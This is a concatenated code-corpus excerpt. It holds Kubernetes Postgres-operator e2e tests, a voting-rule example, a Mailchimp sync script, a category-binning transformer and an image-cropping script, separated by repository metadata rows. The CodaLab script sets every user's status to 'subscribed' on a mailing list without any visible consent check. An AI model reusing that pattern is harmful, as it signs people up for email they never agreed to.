"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_patch_custom_annotations)
annotations = {
"annotation.key": "value",
"foo": "bar",
"alice": "bob"
}
self.eventuallyTrue(lambda: k8s.check_service_annotations("cluster-name=acid-minimal-cluster,spilo-role=master", annotations), "Wrong annotations")
self.eventuallyTrue(lambda: k8s.check_service_annotations("cluster-name=acid-minimal-cluster,spilo-role=replica", annotations), "Wrong annotations")
# clean up
unpatch_custom_service_annotations = {
"data": {
"custom_service_annotations": "",
}
}
k8s.update_config(unpatch_custom_service_annotations)
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_statefulset_annotation_propagation(self):
'''
Inject annotation to Postgresql CRD and check it's propagation to stateful set
'''
k8s = self.k8s
cluster_label = 'application=spilo,cluster-name=acid-minimal-cluster'
patch_sset_propagate_annotations = {
"data": {
"downscaler_annotations": "deployment-time,downscaler/*",
"inherited_annotations": "owned-by",
}
}
k8s.update_config(patch_sset_propagate_annotations)
pg_crd_annotations = {
"metadata": {
"annotations": {
"deployment-time": "2020-04-30 12:00:00",
"downscaler/downtime_replicas": "0",
"owned-by": "acid",
},
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_crd_annotations)
annotations = {
"deployment-time": "2020-04-30 12:00:00",
"downscaler/downtime_replicas": "0",
"owned-by": "acid",
}
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
self.eventuallyTrue(lambda: k8s.check_statefulset_annotations(cluster_label, annotations), "Annotations missing")
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
@unittest.skip("Skipping this test until fixed")
def test_zzz_taint_based_eviction(self):
'''
Add taint "postgres=:NoExecute" to node with master. This must cause a failover.
'''
k8s = self.k8s
cluster_label = 'application=spilo,cluster-name=acid-minimal-cluster'
# verify we are in good state from potential previous tests
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2, "No 2 pods running")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members("acid-minimal-cluster-0")), 2, "Postgres status did not enter running")
# get nodes of master and replica(s) (expected target of new master)
master_nodes, replica_nodes = k8s.get_cluster_nodes()
self.assertNotEqual(master_nodes, [])
self.assertNotEqual(replica_nodes, [])
# taint node with postgres=:NoExecute to force failover
body = {
"spec": {
"taints": [
{
"effect": "NoExecute",
"key": "postgres"
}
]
}
}
k8s.api.core_v1.patch_node(master_nodes[0], body)
self.eventuallyTrue(lambda: k8s.get_cluster_nodes()[0], replica_nodes)
self.assertNotEqual(lambda: k8s.get_cluster_nodes()[0], master_nodes)
# add toleration to pods
patch_toleration_config = {
"data": {
"toleration": "key:postgres,operator:Exists,effect:NoExecute"
}
}
k8s.update_config(patch_toleration_config, step="allow tainted nodes")
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2, "No 2 pods running")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members("acid-minimal-cluster-0")), 2, "Postgres status did not enter running")
# toggle pod anti affinity to move replica away from master node
nm, new_replica_nodes = k8s.get_cluster_nodes()
new_master_node = nm[0]
self.assert_distributed_pods(new_master_node, new_replica_nodes, cluster_label)
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_infrastructure_roles(self):
'''
Test using external secrets for infrastructure roles
'''
k8s = self.k8s
# update infrastructure roles description
secret_name = "postgresql-infrastructure-roles"
roles = "secretname: postgresql-infrastructure-roles-new, userkey: user, rolekey: memberof, passwordkey: password, defaultrolevalue: robot_zmon"
patch_infrastructure_roles = {
"data": {
"infrastructure_roles_secret_name": secret_name,
"infrastructure_roles_secrets": roles,
},
}
k8s.update_config(patch_infrastructure_roles)
# wait a little before proceeding
time.sleep(30)
# check that new roles are represented in the config by requesting the
# operator configuration via API
operator_pod = k8s.get_operator_pod()
get_config_cmd = "wget --quiet -O - localhost:8080/config"
result = k8s.exec_with_kubectl(operator_pod.metadata.name, get_config_cmd)
roles_dict = (json.loads(result.stdout)
.get("controller", {})
.get("InfrastructureRoles"))
self.assertTrue("robot_zmon_acid_monitoring_new" in roles_dict)
role = roles_dict["robot_zmon_acid_monitoring_new"]
role.pop("Password", None)
self.assertDictEqual(role, {
"Name": "robot_zmon_acid_monitoring_new",
"Flags": None,
"MemberOf": ["robot_zmon"],
"Parameters": None,
"AdminRole": "",
"Origin": 2,
})
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_node_affinity(self):
'''
Add label to a node and update postgres cluster spec to deploy only on a node with that label
'''
k8s = self.k8s
cluster_label = 'application=spilo,cluster-name=acid-minimal-cluster'
# verify we are in good state from potential previous tests
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2, "No 2 pods running")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members("acid-minimal-cluster-0")), 2, "Postgres status did not enter running")
self.eventuallyEqual(lambda: self.k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
# get nodes of master and replica(s)
master_node, replica_nodes = k8s.get_pg_nodes(cluster_label)
self.assertNotEqual(master_node, [])
self.assertNotEqual(replica_nodes, [])
# label node with environment=postgres
node_label_body = {
"metadata": {
"labels": {
"node-affinity-test": "postgres"
}
}
}
try:
# patch current master node with the label
print('patching master node: {}'.format(master_node))
k8s.api.core_v1.patch_node(master_node, node_label_body)
# add node affinity to cluster
patch_node_affinity_config = {
"spec": {
"nodeAffinity" : {
"requiredDuringSchedulingIgnoredDuringExecution": {
"nodeSelectorTerms": [
{
"matchExpressions": [
{
"key": "node-affinity-test",
"operator": "In",
"values": [
"postgres"
]
}
]
}
]
}
}
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
group="acid.zalan.do",
version="v1",
namespace="default",
plural="postgresqls",
name="acid-minimal-cluster",
body=patch_node_affinity_config)
self.eventuallyEqual(lambda: self.k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
# node affinity change should cause replica to relocate from replica node to master node due to node affinity requirement
k8s.wait_for_pod_failover(master_node, 'spilo-role=replica,' + cluster_label)
k8s.wait_for_pod_start('spilo-role=replica,' + cluster_label)
podsList = k8s.api.core_v1.list_namespaced_pod('default', label_selector=cluster_label)
for pod in podsList.items:
if pod.metadata.labels.get('spilo-role') == 'replica':
self.assertEqual(master_node, pod.spec.node_name,
"Sanity check: expected replica to relocate to master node {}, but found on {}".format(master_node, pod.spec.node_name))
# check that pod has correct node affinity
key = pod.spec.affinity.node_affinity.required_during_scheduling_ignored_during_execution.node_selector_terms[0].match_expressions[0].key
value = pod.spec.affinity.node_affinity.required_during_scheduling_ignored_during_execution.node_selector_terms[0].match_expressions[0].values[0]
self.assertEqual("node-affinity-test", key,
"Sanity check: expect node selector key to be equal to 'node-affinity-test' but got {}".format(key))
self.assertEqual("postgres", value,
"Sanity check: expect node selector value to be equal to 'postgres' but got {}".format(value))
patch_node_remove_affinity_config = {
"spec": {
"nodeAffinity" : None
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
group="acid.zalan.do",
version="v1",
namespace="default",
plural="postgresqls",
name="acid-minimal-cluster",
body=patch_node_remove_affinity_config)
self.eventuallyEqual(lambda: self.k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
# remove node affinity to move replica away from master node
nm, new_replica_nodes = k8s.get_cluster_nodes()
new_master_node = nm[0]
self.assert_distributed_pods(new_master_node, new_replica_nodes, cluster_label)
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_zzzz_cluster_deletion(self):
'''
Test deletion with configured protection
'''
k8s = self.k8s
cluster_label = 'application=spilo,cluster-name=acid-minimal-cluster'
# configure delete protection
patch_delete_annotations = {
"data": {
"delete_annotation_date_key": "delete-date",
"delete_annotation_name_key": "delete-clustername"
}
}
k8s.update_config(patch_delete_annotations)
time.sleep(25)
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
try:
# this delete attempt should be omitted because of missing annotations
k8s.api.custom_objects_api.delete_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster")
time.sleep(15)
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
# check that pods and services are still there
k8s.wait_for_running_pods(cluster_label, 2)
k8s.wait_for_service(cluster_label)
# recreate Postgres cluster resource
k8s.create_with_kubectl("manifests/minimal-postgres-manifest.yaml")
# wait a little before proceeding
time.sleep(10)
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
# add annotations to manifest
delete_date = datetime.today().strftime('%Y-%m-%d')
pg_patch_delete_annotations = {
"metadata": {
"annotations": {
"delete-date": delete_date,
"delete-clustername": "acid-minimal-cluster",
}
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_patch_delete_annotations)
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
# wait a little before proceeding
time.sleep(20)
k8s.wait_for_running_pods(cluster_label, 2)
k8s.wait_for_service(cluster_label)
# now delete process should be triggered
k8s.api.custom_objects_api.delete_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster")
self.eventuallyEqual(lambda: len(k8s.api.custom_objects_api.list_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", label_selector="cluster-name=acid-minimal-cluster")["items"]), 0, "Manifest not deleted")
# check if everything has been deleted
self.eventuallyEqual(lambda: k8s.count_pods_with_label(cluster_label), 0, "Pods not deleted")
self.eventuallyEqual(lambda: k8s.count_services_with_label(cluster_label), 0, "Service not deleted")
self.eventuallyEqual(lambda: k8s.count_endpoints_with_label(cluster_label), 0, "Endpoints not deleted")
self.eventuallyEqual(lambda: k8s.count_statefulsets_with_label(cluster_label), 0, "Statefulset not deleted")
self.eventuallyEqual(lambda: k8s.count_deployments_with_label(cluster_label), 0, "Deployments not deleted")
self.eventuallyEqual(lambda: k8s.count_pdbs_with_label(cluster_label), 0, "Pod disruption budget not deleted")
self.eventuallyEqual(lambda: k8s.count_secrets_with_label(cluster_label), 0, "Secrets not deleted")
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
# reset configmap
patch_delete_annotations = {
"data": {
"delete_annotation_date_key": "",
"delete_annotation_name_key": ""
}
}
k8s.update_config(patch_delete_annotations)
def get_failover_targets(self, master_node, replica_nodes):
'''
If all pods live on the same node, failover will happen to other worker(s)
'''
k8s = self.k8s
k8s_master_exclusion = 'kubernetes.io/hostname!=postgres-operator-e2e-tests-control-plane'
failover_targets = [x for x in replica_nodes if x != master_node]
if len(failover_targets) == 0:
nodes = k8s.api.core_v1.list_node(label_selector=k8s_master_exclusion)
for n in nodes.items:
if n.metadata.name != master_node:
failover_targets.append(n.metadata.name)
return failover_targets
def assert_failover(self, current_master_node, num_replicas, failover_targets, cluster_label):
'''
Check if master is failing over. The replica should move first to be the switchover target
'''
k8s = self.k8s
k8s.wait_for_pod_failover(failover_targets, 'spilo-role=master,' + cluster_label)
k8s.wait_for_pod_start('spilo-role=replica,' + cluster_label)
new_master_node, new_replica_nodes = k8s.get_pg_nodes(cluster_label)
self.assertNotEqual(current_master_node, new_master_node,
"Master on {} did not fail over to one of {}".format(current_master_node, failover_targets))
self.assertEqual(num_replicas, len(new_replica_nodes),
"Expected {} replicas, found {}".format(num_replicas, len(new_replica_nodes)))
self.assert_master_is_unique()
return new_master_node, new_replica_nodes
def assert_master_is_unique(self, namespace='default', clusterName="acid-minimal-cluster"):
'''
Check that there is a single pod in the k8s cluster with the label "spilo-role=master"
To be called manually after operations that affect pods
'''
k8s = self.k8s
labels = 'spilo-role=master,cluster-name=' + clusterName
num_of_master_pods = k8s.count_pods_with_label(labels, namespace)
self.assertEqual(num_of_master_pods, 1, "Expected 1 master pod, found {}".format(num_of_master_pods))
def assert_distributed_pods(self, master_node, replica_nodes, cluster_label):
'''
Other tests can lead to the situation that master and replica are on the same node.
Toggle pod anti affinty to distribute pods accross nodes (replica in particular).
'''
k8s = self.k8s
failover_targets = self.get_failover_targets(master_node, replica_nodes)
# enable pod anti affintiy in config map which should trigger movement of replica
patch_enable_antiaffinity = {
"data": {
"enable_pod_antiaffinity": "true"
}
}
k8s.update_config(patch_enable_antiaffinity, "enable antiaffinity")
self.assert_failover(master_node, len(replica_nodes), failover_targets, cluster_label)
# now disable pod anti affintiy again which will cause yet another failover
patch_disable_antiaffinity = {
"data": {
"enable_pod_antiaffinity": "false"
}
}
k8s.update_config(patch_disable_antiaffinity, "disable antiaffinity")
k8s.wait_for_pod_start('spilo-role=master')
k8s.wait_for_pod_start('spilo-role=replica')
return True
if __name__ == '__main__':
unittest.main()
| 45.114675
| 165
| 0.588894
|
a5689907a347198054df519f8e748913585a7547
| 2,051
|
py
|
Python
|
examples/abcsurvey/example05.py
|
lumbric/abcvoting
|
e58c9e15abf795536e03df7c16d8639185305679
|
[
"MIT"
] | null | null | null |
examples/abcsurvey/example05.py
|
lumbric/abcvoting
|
e58c9e15abf795536e03df7c16d8639185305679
|
[
"MIT"
] | null | null | null |
examples/abcsurvey/example05.py
|
lumbric/abcvoting
|
e58c9e15abf795536e03df7c16d8639185305679
|
[
"MIT"
] | null | null | null |
"""Example 5 (PAV, seq-PAV, revseq-PAV)
from the survey: "Approval-Based Multi-Winner Voting:
Axioms, Algorithms, and Applications"
by Martin Lackner and Piotr Skowron
"""
from abcvoting import abcrules
from abcvoting.preferences import Profile, Voter
from abcvoting import misc
from abcvoting.output import output
from abcvoting.output import DETAILS
output.set_verbosity(DETAILS)
print(misc.header("Example 5", "*"))
# Approval profile
num_cand = 4
a, b, c, d = range(4) # a = 0, b = 1, c = 2, ...
cand_names = "abcd"
approval_sets = [[a, b]] * 3 + [[a, d]] * 6 + [[b]] * 4 + [[c]] * 5 + [[c, d]] * 5
profile = Profile(num_cand, cand_names=cand_names)
profile.add_voters(approval_sets)
print(misc.header("Input:"))
print(profile.str_compact())
committees_pav = abcrules.compute_pav(profile, 2)
committees_seqpav = abcrules.compute_seqpav(profile, 2)
committees_revseqpav = abcrules.compute_revseqpav(profile, 2)
# verify correctness
assert committees_pav == [{a, c}]
assert committees_seqpav == [{c, d}]
assert committees_revseqpav == [{c, d}]
print("\n")
print(misc.header("Example from Janson's survey (Example 13.3) / Thiele:", "*"))
# Approval profile
num_cand = 4
a, b, c, d = range(4) # a = 0, b = 1, c = 2, ...
cand_names = "abcd"
profile = Profile(num_cand, cand_names=cand_names)
profile.add_voter(Voter([a, c, d], 960))
profile.add_voter(Voter([b, c, d], 3000))
profile.add_voter(Voter([b, c], 520))
profile.add_voter(Voter([a, b], 1620))
profile.add_voter(Voter([a, d], 1081))
profile.add_voter(Voter([a, c], 1240))
profile.add_voter(Voter([b, d], 360))
profile.add_voter(Voter([d], 360))
profile.add_voter(Voter([c], 120))
profile.add_voter(Voter([b], 60))
print(misc.header("Input:"))
print(profile.str_compact())
committees_pav = abcrules.compute_pav(profile, 2)
committees_seqpav = abcrules.compute_seqpav(profile, 2)
committees_revseqpav = abcrules.compute_revseqpav(profile, 2)
# verify correctness
assert committees_pav == [{a, b}]
assert committees_seqpav == [{a, c}]
assert committees_revseqpav == [{b, d}]
| 27.346667
| 82
| 0.710385
|
0aebdf755bc7039739e52f1546be6b5fd5e676c0
| 820
|
py
|
Python
|
k8s/images/codalab/apps/newsletter/scripts/send_emails_to_mailchimp.py
|
abdulari/codalab-competitions
|
fdfbb77ac62d56c6b4b9439935037f97ffcd1423
|
[
"Apache-2.0"
] | 333
|
2015-12-29T22:49:40.000Z
|
2022-03-27T12:01:57.000Z
|
k8s/images/codalab/apps/newsletter/scripts/send_emails_to_mailchimp.py
|
abdulari/codalab-competitions
|
fdfbb77ac62d56c6b4b9439935037f97ffcd1423
|
[
"Apache-2.0"
] | 1,572
|
2015-12-28T21:54:00.000Z
|
2022-03-31T13:00:32.000Z
|
k8s/images/codalab/apps/newsletter/scripts/send_emails_to_mailchimp.py
|
abdulari/codalab-competitions
|
fdfbb77ac62d56c6b4b9439935037f97ffcd1423
|
[
"Apache-2.0"
] | 107
|
2016-01-08T03:46:07.000Z
|
2022-03-16T08:43:57.000Z
|
import json
import requests
from django.contrib.auth import get_user_model
from codalab import settings
User = get_user_model()
def run():
if all([settings.MAILCHIMP_MEMBERS_ENDPOINT_ALL, settings.MAILCHIMP_API_KEY]):
for user in User.objects.all():
data = {
"email_address": user.email,
"status": "subscribed",
}
r = requests.patch(
settings.MAILCHIMP_MEMBERS_ENDPOINT_ALL,
auth=("", settings.MAILCHIMP_API_KEY),
data=json.dumps(data)
)
if not r.ok:
requests.post(
settings.MAILCHIMP_MEMBERS_ENDPOINT_ALL,
auth=("", settings.MAILCHIMP_API_KEY),
data=json.dumps(data)
)
| 27.333333
| 82
| 0.547561
|
1cc6173c1da5b81209ff55f2e29a83ebd3c58a38
| 6,921
|
py
|
Python
|
gators/binning/bin_rare_events.py
|
Aditya-Kapadiya/gators
|
d7c9967e3a8e304a601b6a92ad834d03d3e36338
|
[
"Apache-2.0"
] | 4
|
2021-10-29T18:20:52.000Z
|
2022-03-31T22:53:03.000Z
|
gators/binning/bin_rare_events.py
|
Aditya-Kapadiya/gators
|
d7c9967e3a8e304a601b6a92ad834d03d3e36338
|
[
"Apache-2.0"
] | 1
|
2022-01-19T12:16:19.000Z
|
2022-01-19T12:16:19.000Z
|
gators/binning/bin_rare_events.py
|
Aditya-Kapadiya/gators
|
d7c9967e3a8e304a601b6a92ad834d03d3e36338
|
[
"Apache-2.0"
] | 5
|
2021-11-17T20:16:54.000Z
|
2022-02-21T18:21:02.000Z
|
# License: Apache-2.0
import warnings
from typing import Dict, List, Union
import databricks.koalas as ks
import numpy as np
import pandas as pd
from binning import bin_rare_events
from ..transformers.transformer import Transformer
from ..util import util
class BinRareEvents(Transformer):
"""Replace low occurence categories by the value "OTHERS".
Use `BinRareEvents` to reduce the cardinality
of high cardinal columns. This transformer is also useful
to replace unseen categories by a value which is already
taken it account by the encoders.
Parameters
----------
min_ratio : float
Min occurence ratio per category.
Examples
---------
>>> import pandas as pd
>>> from gators.binning import BinRareEvents
>>> obj = BinRareEvents(min_ratio=0.5)
>>> X = pd.DataFrame({'A': ['a', 'a', 'b'], 'B': ['a', 'b', 'c']})
>>> obj.fit_transform(X)
A B
0 a OTHERS
1 a OTHERS
2 OTHERS OTHERS
* fit & transform with `koalas`
>>> import databricks.koalas as ks
>>> from gators.binning import BinRareEvents
>>> obj = BinRareEvents(min_ratio=0.5)
>>> X = ks.DataFrame({'A': ['a', 'a', 'b'], 'B': ['a', 'b', 'c']})
>>> obj.fit_transform(X)
A B
0 a OTHERS
1 a OTHERS
2 OTHERS OTHERS
* fit with `pandas` & transform with `NumPy`
>>> import pandas as pd
>>> from gators.binning import BinRareEvents
>>> obj = BinRareEvents(min_ratio=0.5)
>>> X = pd.DataFrame({'A': ['a', 'a', 'b'], 'B': ['a', 'b', 'c']})
>>> _ = obj.fit(X)
>>> obj.transform_numpy(X.to_numpy())
array([['a', 'OTHERS'],
['a', 'OTHERS'],
['OTHERS', 'OTHERS']], dtype=object)
* fit with `koalas` & transform with `NumPy`
>>> import databricks.koalas as ks
>>> from gators.binning import BinRareEvents
>>> obj = BinRareEvents(min_ratio=0.5)
>>> X = ks.DataFrame({'A': ['a', 'a', 'b'], 'B': ['a', 'b', 'c']})
>>> _ = obj.fit(X)
>>> obj.transform_numpy(X.to_numpy())
array([['a', 'OTHERS'],
['a', 'OTHERS'],
['OTHERS', 'OTHERS']], dtype=object)
"""
def __init__(self, min_ratio: float):
if not isinstance(min_ratio, float):
raise TypeError("""`min_ratio` should be a float.""")
Transformer.__init__(self)
self.min_ratio = min_ratio
self.columns = []
self.idx_columns: np.ndarray = np.array([])
self.categories_to_keep_np: np.ndarray = None
self.n_categories_to_keep_np: np.ndarray = None
self.categories_to_keep_dict: Dict[str, np.ndarray] = {}
def fit(self, X: Union[pd.DataFrame, ks.DataFrame], y=None) -> "BinRareEvents":
"""Fit the transformer on the dataframe `X`.
Parameters
----------
X : Union[pd.DataFrame, ks.DataFrame].
Input dataframe.
y : None
None.
Returns
-------
BinRareEvents
Instance of itself.
"""
self.check_dataframe(X)
if object not in X.dtypes.to_numpy():
warnings.warn(
"""`X` does not contain object columns:
`BinRareEvents` is not needed"""
)
return self
self.columns = util.get_datatype_columns(X, datatype=object)
self.categories_to_keep_dict = self.compute_categories_to_keep_dict(
X=X[self.columns],
min_ratio=self.min_ratio,
)
self.categories_to_keep_np = self.get_categories_to_keep_np(
categories_to_keep_dict=self.categories_to_keep_dict,
)
self.n_categories_to_keep_np = self.categories_to_keep_np.shape[0] - (
self.categories_to_keep_np == None
).sum(0)
self.idx_columns = util.get_idx_columns(
columns=X.columns, selected_columns=self.columns
)
return self
def transform(
self, X: Union[pd.DataFrame, ks.DataFrame]
) -> Union[pd.DataFrame, ks.DataFrame]:
"""Transform the dataframe `X`.
Parameters
----------
X : Union[pd.DataFrame, ks.DataFrame].
Input dataframe.
Returns
-------
Union[pd.DataFrame, ks.DataFrame]
Transformed dataframe.
"""
self.check_dataframe(X)
def f(x):
name = x.name
if name not in self.categories_to_keep_dict:
return x
return x.mask(~x.isin(self.categories_to_keep_dict[name]), "OTHERS")
return X.apply(f)
def transform_numpy(self, X: np.ndarray) -> np.ndarray:
"""Transform the NumPy array.
Parameters
----------
X : np.ndarray
NumPy array.
Returns
-------
np.ndarray
Transformed NumPy array.
"""
self.check_array(X)
if self.idx_columns.size == 0:
return X
if self.categories_to_keep_np.shape[0] == 0:
X[:, self.idx_columns] = "OTHERS"
return X
return bin_rare_events(
X,
self.categories_to_keep_np,
self.n_categories_to_keep_np,
self.idx_columns,
)
@staticmethod
def compute_categories_to_keep_dict(
X: Union[pd.DataFrame, ks.DataFrame], min_ratio: float
) -> Dict[str, List[str]]:
"""Compute the category frequency.
Parameters
----------
X : Union[pd.DataFrame, ks.DataFrame].
Input dataframe.
min_ratio : float
Min occurence per category.
Returns
-------
Dict[str, List[str]]: Categories to keep.
"""
def f(x):
freq = x.astype("object").value_counts(normalize=True).sort_values()
freq = freq[freq >= min_ratio]
return list(freq.index)
mapping = X.apply(f).to_dict()
mapping = {
key: val if isinstance(val, list) else list(val.values())
for key, val in mapping.items()
}
return mapping
@staticmethod
def get_categories_to_keep_np(
categories_to_keep_dict: Dict[str, np.ndarray]
) -> np.ndarray:
"""Get the categories to keep.
Parameters
----------
categories_to_keep_dict : Dict[str, np.ndarray])
Categories to keep.
Returns
-------
np.ndarray
Categories to keep.
"""
max_category = max([len(val) for val in categories_to_keep_dict.values()])
n_columns = len(categories_to_keep_dict)
categories_to_keep_np = np.empty((max_category, n_columns), dtype="object")
for i, val in enumerate(categories_to_keep_dict.values()):
categories_to_keep_np[: len(val), i] = val
return categories_to_keep_np
| 29.831897
| 83
| 0.56148
|
2707b2adf0a41bf4bbc55e6c645c6838acf25b23
| 5,447
|
py
|
Python
|
tools/aicity20/weakly_supervised_crop_aug.py
|
Johere/AICity2020-VOC-ReID
|
21268535595c8c90b87cd1ee89ddbcb341a86d76
|
[
"MIT"
] | 100
|
2020-04-25T03:58:01.000Z
|
2022-03-30T18:24:17.000Z
|
tools/aicity20/weakly_supervised_crop_aug.py
|
Johere/AICity2020-VOC-ReID
|
21268535595c8c90b87cd1ee89ddbcb341a86d76
|
[
"MIT"
] | 30
|
2020-04-27T07:15:00.000Z
|
2022-01-03T19:49:49.000Z
|
tools/aicity20/weakly_supervised_crop_aug.py
|
Johere/AICity2020-VOC-ReID
|
21268535595c8c90b87cd1ee89ddbcb341a86d76
|
[
"MIT"
] | 25
|
2020-04-25T22:53:30.000Z
|
2022-03-28T00:46:51.000Z
|
'''
detect object by actmap
'''
# encoding: utf-8
import argparse
import os
import sys
from os import mkdir
import cv2
import numpy as np
import torch
from torch.backends import cudnn
from torch.nn import functional as F
import json
sys.path.append('.')
from lib.config import cfg
from lib.data import make_data_loader
from lib.engine.inference import inference
from lib.modeling import build_model
from lib.utils.logger import setup_logger
from lib.utils.bbox_utils import localize_from_map, draw_bbox
def vis_actmap(model, cfg, loader, out_dir):
device = cfg.MODEL.DEVICE
model.to(device)
model.eval()
img_size = cfg.INPUT.SIZE_TEST
if not os.path.exists(out_dir):
os.mkdir(out_dir)
if not os.path.exists(os.path.join(out_dir, 'image_train')):
os.mkdir(os.path.join(out_dir, 'image_train'))
if not os.path.exists(os.path.join(out_dir, 'image_query')):
os.mkdir(os.path.join(out_dir, 'image_query'))
if not os.path.exists(os.path.join(out_dir, 'image_test')):
os.mkdir(os.path.join(out_dir, 'image_test'))
results = []
with torch.no_grad():
for i, batch in enumerate(loader):
data, pid, camid, img_path = batch
data = data.cuda()
featmap = model(data, return_featmap=True) # N*2048*7*7
featmap = (featmap**2).sum(1) # N*1*7*7
canvas = []
for j in range(featmap.size(0)):
fm = featmap[j].detach().cpu().numpy()
# something is not right!
# fm[0:3, 0:3] = 0
# fm[0:3, 12:15] = 0
# fm[12:15, 0:3] = 0
# fm[12:15, 12:15] = 0
fm[0:4, :] = 0
fm[12:16, :] = 0
fm[:, 0:4] = 0
fm[:, 12:16] = 0
fm = cv2.resize(fm, (img_size[1], img_size[0]))
fm = 255 * (fm - np.min(fm)) / (
np.max(fm) - np.min(fm) + 1e-12
)
bbox = localize_from_map(fm, threshold_ratio=1.0)
fm = np.uint8(np.floor(fm))
fm = cv2.applyColorMap(fm, cv2.COLORMAP_JET)
img = cv2.imread(img_path[j])
height, width, _ = img.shape
#img = cv2.resize(img, (img_size[1], img_size[0]))
bbox = np.array(bbox, dtype=np.float32)
bbox[0::2] *= width / img_size[1]
bbox[1::2] *= height / img_size[0]
bbox[:2] *= 0.7
bbox[2:] *= 1.2
bbox = np.array(bbox, dtype=np.int)
results.append({'img_path': '/'.join(img_path[j].split('/')[-2:]), 'bbox': bbox.tolist()})
crop = img[bbox[1]:bbox[3], bbox[0]:bbox[2], :]
#crop = cv2.resize(crop, (img_size[1], img_size[0]))
cv2.imwrite(os.path.join(out_dir, '/'.join(img_path[j].split('/')[-2:])), crop)
#overlapped = img * 0.3 + fm * 0.7
#overlapped = draw_bbox(overlapped, [bbox])
#overlapped = overlapped.astype(np.uint8)
#canvas.append(cv2.resize(overlapped, (img_size[1], img_size[0])))
#canvas = np.concatenate(canvas[:8], axis=1) # .reshape([-1, 2048, 3])
#cv2.imwrite(os.path.join(out_dir, '{}.jpg'.format(i)), canvas)
return results
def main():
parser = argparse.ArgumentParser(description="ReID Baseline Inference")
parser.add_argument(
"--config_file", default="./configs/debug.yml", help="path to config file", type=str
)
parser.add_argument("opts", help="Modify config options using the command-line", default=None,
nargs=argparse.REMAINDER)
args = parser.parse_args()
num_gpus = int(os.environ["WORLD_SIZE"]) if "WORLD_SIZE" in os.environ else 1
if args.config_file != "":
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
output_dir = cfg.OUTPUT_DIR
if output_dir and not os.path.exists(output_dir):
mkdir(output_dir)
logger = setup_logger("reid_baseline", output_dir, 0)
logger.info("Using {} GPUS".format(num_gpus))
logger.info(args)
if args.config_file != "":
logger.info("Loaded configuration file {}".format(args.config_file))
logger.info("Running with config:\n{}".format(cfg))
if cfg.MODEL.DEVICE == "cuda":
os.environ['CUDA_VISIBLE_DEVICES'] = cfg.MODEL.DEVICE_ID
cudnn.benchmark = True
train_loader, val_loader, num_query, num_classes, dataset = make_data_loader(cfg)
model = build_model(cfg, num_classes)
model.load_param(cfg.TEST.WEIGHT)
results = []
out_dir = os.path.dirname(cfg.TEST.WEIGHT)
results += vis_actmap(model, cfg, train_loader, out_dir)
results += vis_actmap(model, cfg, val_loader, out_dir)
with open(os.path.join(out_dir, 'detection.json'), 'w') as f:
json.dump(results, f)
if __name__ == '__main__':
main()
'''
python tools/aicity20/weakly_supervised_crop_aug.py --config_file='configs/aicity20.yml' \
MODEL.DEVICE_ID "('0')" \
MODEL.NAME "('resnet50_ibn_a')" \
MODEL.MODEL_TYPE "baseline" \
DATASETS.TRAIN "('aicity20',)" \
DATASETS.TEST "('aicity20',)" \
DATALOADER.SAMPLER 'softmax' \
DATASETS.ROOT_DIR "('/home/zxy/data/ReID/vehicle')" \
MODEL.PRETRAIN_CHOICE "('self')" \
TEST.WEIGHT "('./output/aicity20/0326-search/augmix/best.pth')"
'''
| 33.213415
| 106
| 0.590233
|
c32938e59deb0fe5384b4584d38798d48ec25f49
| 366
|
py
|
Python
|
dodo.py
|
thepinetree/noisepage-pilot
|
97ab95d2458fe3974aac13935094be17fca69522
|
[
"MIT"
] | null | null | null |
dodo.py
|
thepinetree/noisepage-pilot
|
97ab95d2458fe3974aac13935094be17fca69522
|
[
"MIT"
] | null | null | null |
dodo.py
|
thepinetree/noisepage-pilot
|
97ab95d2458fe3974aac13935094be17fca69522
|
[
"MIT"
] | null | null | null |
# doit automatically picks up tasks as long as their unqualified name is prefixed with task_.
# Read the guide: https://pydoit.org/tasks.html
from dodos.action import *
from dodos.behavior import *
from dodos.benchbase import *
from dodos.ci import *
from dodos.forecast import *
from dodos.noisepage import *
from dodos.pilot import *
from dodos.project1 import *
| 30.5
| 93
| 0.781421
|
ab6f71c14767fe898f2ae8f31ecf19df2495df62
| 4,072
|
py
|
Python
|
dashboard/lib/flanker/mime/message/headers/encodedword.py
|
robertsimmons514/isthislegit
|
aa8f2b6cb2ac3de2b0fe03bb93dbceccc4c1f495
|
[
"BSD-3-Clause"
] | 282
|
2017-07-01T03:47:54.000Z
|
